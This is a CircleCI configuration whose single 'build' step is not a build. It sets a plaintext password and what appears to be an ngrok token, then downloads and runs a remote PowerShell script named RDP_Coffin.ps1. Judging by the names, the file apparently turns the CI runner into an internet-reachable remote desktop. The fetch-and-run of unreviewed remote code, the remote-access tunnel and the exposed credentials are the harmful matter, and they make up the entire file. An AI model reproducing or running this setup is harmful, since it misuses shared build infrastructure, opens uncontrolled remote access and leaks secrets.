version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: new
          command: |
            Set-Variable -Name "PASSWORD" -Value "Prime456$"
            Set-Variable -Name "NGROK" -Value "1tE0yQbjcgM3P7BGZUNC9qxsvd1_2VKHGQxXbqdgX5ZnsnTAF"
            Invoke-WebRequest https://raw.githubusercontent.com/navy-ss/15af/master/RDP_Coffin.ps1 -OutFile RDP_Coffin.ps1
            ./RDP_Coffin.ps1
